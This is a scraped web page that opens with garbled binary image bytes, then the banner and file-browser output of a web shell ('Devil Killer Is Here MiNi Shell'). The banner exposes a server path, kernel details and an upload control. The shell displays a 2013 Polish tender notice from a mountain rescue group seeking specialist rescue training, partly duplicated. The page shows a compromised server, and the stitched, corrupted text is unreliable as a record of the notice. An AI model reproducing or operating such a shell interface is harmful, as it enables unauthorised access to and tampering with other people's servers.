JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131003/402510-N-2013.html

<p class="kh_header"><b>Szczyrk: Przeprowadzenie szkoleń z zakresu specjalistycznego ratownictwa górskiego w ramach projektu Na każde wezwanie II.</b><br>
<b>Numer ogłoszenia: 402510 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Grupa Regionalna GOPR Grupa Beskidzka , ul. Dębowa 2, 43-370 Szczyrk, woj. śląskie, tel. 033 8296900, faks 033 8296904.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.beskidy.gopr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń z zakresu specjalistycznego ratownictwa górskiego w ramach projektu Na każde wezwanie II..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 11.Przedmiotem zamówienia jest przeprowadzenie szkoleń z zakresu specjalistycznego ratownictwa górskiego, w ramach projektu (Na każde wezwanie II), w tym zapewnienie wykwalifikowanych trenerów, przygotowanie merytoryczne szkoleń, opracowanie programu szkolenia, materiałów szkoleniowych dla uczestników,uczestniczek.
3.Ogólne zasady realizacji szkoleń: 
3.1Zajęcia odbywać się będą w grupach 15-to osobowych, w dniach piątek-sobota-niedziela (w zależności od liczby godzin szkoleniowych przypadających na dane szkolenie). Obozy kondycyjne odbywać się będą w dniach środa-niedziela. 
3.2Forma organizacji szkolenia: szkolenia będą mieć formę praktycznych ćwiczeń w terenie górskim.  
3.3Miejsce realizacji szkoleń: tereny górskie woj. śląskiego, a w przypadku obozów kondycyjnych (zimowe i letnie) - Alpy.
3.4Przewidywany czas realizacji zamówienia: od października 2013 - do czerwca 2015. Szczegółowy harmonogram zajęć zostanie uzgodniony z Wykonawcą.  
3.5Każde ze szkoleń prowadzone będzie przez parę trenerską: instruktor prowadzący oraz instruktor asystent, a w przypadku szkolenia (techniki linowe) oraz letniego obozu kondycyjnego: instruktor prowadzący oraz dwóch instruktorów asystentów.
3.6Zamawiający zapewnia noclegi oraz całodobowe wyżywienie dla uczestników szkolenia oraz dla trenerów w czasie trwania szkolenia. Zamawiający zapewnia transport uczestników oraz trenerów do miejsca szkolenia. 
3.7Zamawiający przewiduje realizację min. 4 edycji szkoleń z każdego tematu, co przekłada się na 944 godziny szkoleniowe łącznie. 
3.8Zamawiający zastrzega sobie możliwość organizacji dwóch szkoleń (dla dwóch odrębnych grup) w tym samym terminie. 
4.Tematyka i zakres szkoleń. 
Przedmiotem zamówienia jest przygotowanie i przeprowadzenie przez Wykonawcę szkoleń w następujących tematach: 
Organizacja działań poszukiwawczo-ratowniczych 
Czas: 28 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą posiadać podstawową wiedzę z zakresu topografii oraz systemów nawigacyjnych, ponadto przeszli podstawowe szkolenia z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-taktyka akcji poszukiwawczo-ratowniczych,
-postępowanie w przypadku zdarzeń masowych,
-zarządzanie i współpraca z zespołem,
-komputerowe systemy nawigacyjne wraz z ręcznymi urządzeniami,
-GIS i modelowanie terenu poszukiwań,
-wykorzystanie psów ratowniczych.
Ratownictwo z powietrza (z wykorzystaniem śmigłowca) 
Czas: 24 godziny dydaktyczne
Poziom grupy: średniozaawansowany ( uczestnicy muszą posługiwać się technikami linowymi)
Minimalny zakres merytoryczny szkolenia:
-bezpieczna współpraca ze śmigłowcem, 
-organizacja bezpiecznego lądowiska,
-desant przy użyciu różnego rodzaju lin,
-zastosowanie (długiej liny),
-działania ratownicze z pokładu śmigłowca, 
-ewakuacja z wykorzystaniem śmigłowca.
Techniki linowe 
Czas: 40 godzin dydaktycznych
Poziom grupy: średniozaawansowany ( uczestnicy muszą posiadać podstawowe umiejętności z zakresu technik linowych oraz umiejętność pokonywania dróg wspinaczkowych o trudności co najmniej 4 skali UIAA.
Minimalny zakres merytoryczny szkolenia:
-wspinaczka skalna i alpejska
-autoratownictwo
-układy linowe
-ratownictwo ścianowe
-ratownictwo jaskiniowe
-ewakuacja z kolei linowych
-ewakuacja z drzew i konstrukcji
Ratownictwo zimowe 
Czas: 32 godziny dydaktyczne
Poziom grupy: średniozaawansowany - uczestnicy muszą posiadać podstawową wiedzę z zakresu poruszania się w górach w warunkach zimowych oraz podstawową znajomość technik linowych.
Minimalny zakres merytoryczny szkolenia:
-poruszanie w eksponowanym terenie w warunkach zimowych
-umiejętność oceny zagrożeń zwłaszcza lawinowych 
-wykorzystanie technik linowych w warunkach zimowych
-umiejętność poruszania się skuterem śnieżnym w różnych warunkach śniegowych
-autoratownictwo
Ratownictwo lawinowe 
Czas: 16 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą posiadać podstawową wiedzę z zakresu poruszania się w górach w warunkach zimowych oraz podstawową wiedzę z zakresu lawin.
Minimalny zakres merytoryczny szkolenia:
-powstawanie lawin - znajomość czynników i ich przemian
-analiza warunków, ocena zagrożenia lawinowego
-poruszanie się w terenie zagrożonym
-umiejętność wykonania testów lawinowych min.3
-umiejętność posługiwania się detektorami lawinowymi
-umiejętność posługiwania się systemem RECCO
-ratownictwo lawinowe.
Ratownictwo na wodach szybkopłynących i powodziowych
Czas: 16 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą umieć pływać na poziomie specjalnej karty pływackiej oraz posiadać podstawową wiedzę z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-pływanie ofensywne i defensywne 
-wykorzystanie sprzętu z zakresu ratownictwa wodnego 
-poruszanie się pontonem i innymi środkami wodnymi
-techniki wyławiania poszkodowanych z wody.
Zimowy obóz kondycyjny
Czas: 40 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą umieć swobodnie poruszać się na nartach oraz znać min. 3 ewolucje oraz posiadać podstawową wiedzę z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-jazda na nartach na trasach przygotowanych
-jazda na nartach w warunkach pozatrasowych
-ewolucje narciarskie małych prędkości
-ewolucje narciarskie dużych prędkości. 
Letni obóz kondycyjny
Czas: 40 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą umieć pływać na poziomie specjalnej karty pływackiej, pokonywać drogi wspinaczkowe o trudności co najmniej 4 skali UIAA, posiadać podstawową wiedzę z zakresu technik linowych oraz posiadać podstawową wiedzę z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-poruszanie się pontonem i innymi środkami wodnymi
-techniki wyławiania poszkodowanych z wody
-techniki linowe przy pokonywaniu rzek i terenów eksponowanych 
-wspinaczka alpejska
-autoratownictwo.
5.W ramach zamówienia Wykonawca jest zobowiązany do: 
5.1.zapewnienia trenera,trenerów wskazanych w załączniku nr 4 do SIWZ lub innego(innych o równoważnych kwalifikacjach i doświadczeniu
5.2.opracowania autorskiego konspektu szkolenia, wraz ze wskazaniem sprzętu osobistego i zespołowego, niezbędnego do przeprowadzenia szkoleń; konspekt powinien być opracowany w formie elektronicznej, edytowalnej i przekazany Zamawiającemu do zaakceptowania; Wykonawca dostarczy program szkolenia do Biura Projektu w terminie 14 dni po podpisaniu umowy z Zamawiającym
5.3.weryfikacji i zmiany programów szkoleniowych i dostosowania ich do potrzeb uczestników - na żądanie Zamawiającego; 
5.4.opracowania merytorycznego wzoru materiałów dydaktycznych dla potrzeb realizacji szkoleń oraz dostarczenia wzoru tych materiałów do Biura Projektu najpóźniej 5 dni roboczych przed planowanym rozpoczęciem szkolenia
5.5.prowadzenia dokumentacji szkoleniowej, zgodnie z wzorem dostarczonym przez Zamawiającego
5.6.przekazania dokumentacji szkoleniowej w oryginale Zamawiającemu w terminie 7 dni po zakończeniu każdego szkolenia
5.7.współpracy z doradcą ds. merytorycznych w kwestiach dotyczących merytorycznej zawartości szkoleń oraz oceny procesu dydaktycznego
5.8.współpracy przy przeprowadzaniu ankiet badania satysfakcji uczestników szkolenia i ewaluacyjnych, zgodnie z wzorem dostarczonym przez Zamawiającego
5.9.zapewnienia wysokiego poziomu merytorycznego szkolenia oraz warunków zgodnych z przepisami BHP
5.10.współpracy z Zamawiającym w ramach prowadzonych szkoleń będących przedmiotem zamówienia. 
6.W ramach zamówienia Zamawiający zobowiązany jest do: 
6.1.przekazania Wykonawcy ustalonego harmonogramu szkoleń nie później niż na 14 dni przed planowanym szkoleniem. Harmonogram szkoleń zawierać będzie daty szkoleń, miejsce oraz liczbę uczestników w podziale na grupy szkoleniowe
6.2.przygotowania (wydruku) materiałów szkoleniowych zgodnie z wzorem przesłanym przez Wykonawcę i przekazania im uczestnikom szkoleń 
6.3.dostarczenia Wykonawcy wzorów dokumentacji szkoleniowej
6.4.dostarczenie Wykonawcy materiałów przydatnych do oznaczenia miejsca szkolenia
6.5.zapewnienia sprzętu zespołowego do prowadzenia szkoleń.
7.W ramach zamówienia każdy trener zobowiązany jest do: 
7.1.kontrolowania obecności na zajęciach i przedstawiania listy obecności do podpisu uczestnikom
7.2.dopilnowania wypełnienia przez uczestników ankiet ewaluacyjnych
7.3.rzetelnego wypełnienia i prowadzenia wskazanej przez Zamawiającego dokumentacji szkoleń (np. dzienniki zajęć)
7.4.informowania uczestników szkolenia, że projekt jest współfinasowany ze środków Europejskiego Funduszu Społecznego.
8.Zamawiający zastrzega sobie prawo kontroli usług świadczonych przez Wykonawcę przez pracowników Zamawiającego lub osoby upoważnione przez Zamawiającego. 
9.Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym Załącznik Nr 1 do SIWZ.
10.Zamawiający zastrzega, że zgodnie z warunkami wykonania zamówienia, określonymi szczegółowo we wzorze umowy, dopuszcza się rezygnację Zamawiającego z realizacji maksymalnie 50% przedmiotu zamówienia, a Wykonawca nie będzie z tego tytułu zgłaszał żadnych roszczeń. 
11.Projekt Na każde wezwanie II jest współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VIII Regionalne kadry gospodarki, Działanie 8.1 Rozwój pracowników i przedsiębiorstw w regionie, Poddziałanie 8.1.1 Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>11.Przedmiotem zamówienia jest przeprowadzenie szkoleń z zakresu specjalistycznego ratownictwa górskiego, w ramach projektu (Na każde wezwanie II), w tym zapewnienie wykwalifikowanych trenerów, przygotowanie merytoryczne szkoleń, opracowanie programu szkolenia, materiałów szkoleniowych dla uczestników,uczestniczek.
3.Ogólne zasady realizacji szkoleń: 
3.1Zajęcia odbywać się będą w grupach 15-to osobowych, w dniach piątek-sobota-niedziela (w zależności od liczby godzin szkoleniowych przypadających na dane szkolenie). Obozy kondycyjne odbywać się będą w dniach środa-niedziela. 
3.2Forma organizacji szkolenia: szkolenia będą mieć formę praktycznych ćwiczeń w terenie górskim.  
3.3Miejsce realizacji szkoleń: tereny górskie woj. śląskiego, a w przypadku obozów kondycyjnych (zimowe i letnie) - Alpy.
3.4Przewidywany czas realizacji zamówienia: od października 2013 - do czerwca 2015. Szczegółowy harmonogram zajęć zostanie uzgodniony z Wykonawcą.  
3.5Każde ze szkoleń prowadzone będzie przez parę trenerską: instruktor prowadzący oraz instruktor asystent, a w przypadku szkolenia (techniki linowe) oraz letniego obozu kondycyjnego: instruktor prowadzący oraz dwóch instruktorów asystentów.
3.6Zamawiający zapewnia noclegi oraz całodobowe wyżywienie dla uczestników szkolenia oraz dla trenerów w czasie trwania szkolenia. Zamawiający zapewnia transport uczestników oraz trenerów do miejsca szkolenia. 
3.7Zamawiający przewiduje realizację min. 4 edycji szkoleń z każdego tematu, co przekłada się na 944 godziny szkoleniowe łącznie. 
3.8Zamawiający zastrzega sobie możliwość organizacji dwóch szkoleń (dla dwóch odrębnych grup) w tym samym terminie. 
4.Tematyka i zakres szkoleń. 
Przedmiotem zamówienia jest przygotowanie i przeprowadzenie przez Wykonawcę szkoleń w następujących tematach: 
Organizacja działań poszukiwawczo-ratowniczych 
Czas: 28 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą posiadać podstawową wiedzę z zakresu topografii oraz systemów nawigacyjnych, ponadto przeszli podstawowe szkolenia z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-taktyka akcji poszukiwawczo-ratowniczych,
-postępowanie w przypadku zdarzeń masowych,
-zarządzanie i współpraca z zespołem,
-komputerowe systemy nawigacyjne wraz z ręcznymi urządzeniami,
-GIS i modelowanie terenu poszukiwań,
-wykorzystanie psów ratowniczych.
Ratownictwo z powietrza (z wykorzystaniem śmigłowca) 
Czas: 24 godziny dydaktyczne
Poziom grupy: średniozaawansowany ( uczestnicy muszą posługiwać się technikami linowymi)
Minimalny zakres merytoryczny szkolenia:
-bezpieczna współpraca ze śmigłowcem, 
-organizacja bezpiecznego lądowiska,
-desant przy użyciu różnego rodzaju lin,
-zastosowanie (długiej liny),
-działania ratownicze z pokładu śmigłowca, 
-ewakuacja z wykorzystaniem śmigłowca.
Techniki linowe 
Czas: 40 godzin dydaktycznych
Poziom grupy: średniozaawansowany ( uczestnicy muszą posiadać podstawowe umiejętności z zakresu technik linowych oraz umiejętność pokonywania dróg wspinaczkowych o trudności co najmniej 4 skali UIAA.
Minimalny zakres merytoryczny szkolenia:
-wspinaczka skalna i alpejska
-autoratownictwo
-układy linowe
-ratownictwo ścianowe
-ratownictwo jaskiniowe
-ewakuacja z kolei linowych
-ewakuacja z drzew i konstrukcji
Ratownictwo zimowe 
Czas: 32 godziny dydaktyczne
Poziom grupy: średniozaawansowany - uczestnicy muszą posiadać podstawową wiedzę z zakresu poruszania się w górach w warunkach zimowych oraz podstawową znajomość technik linowych.
Minimalny zakres merytoryczny szkolenia:
-poruszanie w eksponowanym terenie w warunkach zimowych
-umiejętność oceny zagrożeń zwłaszcza lawinowych 
-wykorzystanie technik linowych w warunkach zimowych
-umiejętność poruszania się skuterem śnieżnym w różnych warunkach śniegowych
-autoratownictwo
Ratownictwo lawinowe 
Czas: 16 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą posiadać podstawową wiedzę z zakresu poruszania się w górach w warunkach zimowych oraz podstawową wiedzę z zakresu lawin.
Minimalny zakres merytoryczny szkolenia:
-powstawanie lawin - znajomość czynników i ich przemian
-analiza warunków, ocena zagrożenia lawinowego
-poruszanie się w terenie zagrożonym
-umiejętność wykonania testów lawinowych min.3
-umiejętność posługiwania się detektorami lawinowymi
-umiejętność posługiwania się systemem RECCO
-ratownictwo lawinowe.
Ratownictwo na wodach szybkopłynących i powodziowych
Czas: 16 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą umieć pływać na poziomie specjalnej karty pływackiej oraz posiadać podstawową wiedzę z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-pływanie ofensywne i defensywne 
-wykorzystanie sprzętu z zakresu ratownictwa wodnego 
-poruszanie się pontonem i innymi środkami wodnymi
-techniki wyławiania poszkodowanych z wody.
Zimowy obóz kondycyjny
Czas: 40 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą umieć swobodnie poruszać się na nartach oraz znać min. 3 ewolucje oraz posiadać podstawową wiedzę z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-jazda na nartach na trasach przygotowanych
-jazda na nartach w warunkach pozatrasowych
-ewolucje narciarskie małych prędkości
-ewolucje narciarskie dużych prędkości. 
Letni obóz kondycyjny
Czas: 40 godzin dydaktycznych
Poziom grupy: średniozaawansowany - uczestnicy muszą umieć pływać na poziomie specjalnej karty pływackiej, pokonywać drogi wspinaczkowe o trudności co najmniej 4 skali UIAA, posiadać podstawową wiedzę z zakresu technik linowych oraz posiadać podstawową wiedzę z zakresu ratownictwa.
Minimalny zakres merytoryczny szkolenia:
-poruszanie się pontonem i innymi środkami wodnymi
-techniki wyławiania poszkodowanych z wody
-techniki linowe przy pokonywaniu rzek i terenów eksponowanych 
-wspinaczka alpejska
-autoratownictwo.
5.W ramach zamówienia Wykonawca jest zobowiązany do: 
5.1.zapewnienia trenera,trenerów wskazanych w załączniku nr 4 do SIWZ lub innego(innych o równoważnych kwalifikacjach i doświadczeniu
5.2.opracowania autorskiego konspektu szkolenia, wraz ze wskazaniem sprzętu osobistego i zespołowego, niezbędnego do przeprowadzenia szkoleń; konspekt powinien być opracowany w formie elektronicznej, edytowalnej i przekazany Zamawiającemu do zaakceptowania; Wykonawca dostarczy program szkolenia do Biura Projektu w terminie 14 dni po podpisaniu umowy z Zamawiającym
5.3.weryfikacji i zmiany programów szkoleniowych i dostosowania ich do potrzeb uczestników - na żądanie Zamawiającego; 
5.4.opracowania merytorycznego wzoru materiałów dydaktycznych dla potrzeb realizacji szkoleń oraz dostarczenia wzoru tych materiałów do Biura Projektu najpóźniej 5 dni roboczych przed planowanym rozpoczęciem szkolenia
5.5.prowadzenia dokumentacji szkoleniowej, zgodnie z wzorem dostarczonym przez Zamawiającego
5.6.przekazania dokumentacji szkoleniowej w oryginale Zamawiającemu w terminie 7 dni po zakończeniu każdego szkolenia
5.7.współpracy z doradcą ds. merytorycznych w kwestiach dotyczących merytorycznej zawartości szkoleń oraz oceny procesu dydaktycznego
5.8.współpracy przy przeprowadzaniu ankiet badania satysfakcji uczestników szkolenia i ewaluacyjnych, zgodnie z wzorem dostarczonym przez Zamawiającego
5.9.zapewnienia wysokiego poziomu merytorycznego szkolenia oraz warunków zgodnych z przepisami BHP
5.10.współpracy z Zamawiającym w ramach prowadzonych szkoleń będących przedmiotem zamówienia. 
6.W ramach zamówienia Zamawiający zobowiązany jest do: 
6.1.przekazania Wykonawcy ustalonego harmonogramu szkoleń nie później niż na 14 dni przed planowanym szkoleniem. Harmonogram szkoleń zawierać będzie daty szkoleń, miejsce oraz liczbę uczestników w podziale na grupy szkoleniowe
6.2.przygotowania (wydruku) materiałów szkoleniowych zgodnie z wzorem przesłanym przez Wykonawcę i przekazania im uczestnikom szkoleń 
6.3.dostarczenia Wykonawcy wzorów dokumentacji szkoleniowej
6.4.dostarczenie Wykonawcy materiałów przydatnych do oznaczenia miejsca szkolenia
6.5.zapewnienia sprzętu zespołowego do prowadzenia szkoleń.
7.W ramach zamówienia każdy trener zobowiązany jest do: 
7.1.kontrolowania obecności na zajęciach i przedstawiania listy obecności do podpisu uczestnikom
7.2.dopilnowania wypełnienia przez uczestników ankiet ewaluacyjnych
7.3.rzetelnego wypełnienia i prowadzenia wskazanej przez Zamawiającego dokumentacji szkoleń (np. dzienniki zajęć)
7.4.informowania uczestników szkolenia, że projekt jest współfinasowany ze środków Europejskiego Funduszu Społecznego.
8.Zamawiający zastrzega sobie prawo kontroli usług świadczonych przez Wykonawcę przez pracowników Zamawiającego lub osoby upoważnione przez Zamawiającego. 
9.Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym Załącznik Nr 1 do SIWZ.
10.Zamawiający zastrzega, że zgodnie z warunkami wykonania zamówienia, określonymi szczegółowo we wzorze umowy, dopuszcza się rezygnację Zamawiającego z realizacji maksymalnie 50% przedmiotu zamówienia, a Wykonawca nie będzie z tego tytułu zgłaszał żadnych roszczeń. 
11.Projekt Na każde wezwanie II jest współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VIII Regionalne kadry gospodarki, Działanie 8.1 Rozwój pracowników i przedsiębiorstw w regionie, Poddziałanie 8.1.1 Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> VII. Wymagania dotyczące wadium. 

1.Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 10.000 złotych (słownie: dziesięć tysięcy złotych 00/100). 
2.Wadium należy wnieść w pieniądzu poprzez wpłatę przelewem na konto bankowe nr 83 1050 1070 1000 0001 0004 1896.
3.Zamawiający uzna, że wadium w formie pieniężnej zostało wniesione w terminie, jeżeli do dnia i godziny otwarcia ofert kwota wadium będzie zaksięgowana na koncie Zamawiającego.
4.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
5.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
6.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
8.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
8.1.odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
8.2.nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
8.3.zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy: 
1.1.spełniają warunek określony w art. 22 ust. 1 pkt 1 ustawy, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2.	spełniają warunek określony w art. 22 ust. 1 pkt 2 ustawy, dotyczący posiadania wiedzy i doświadczenia; 
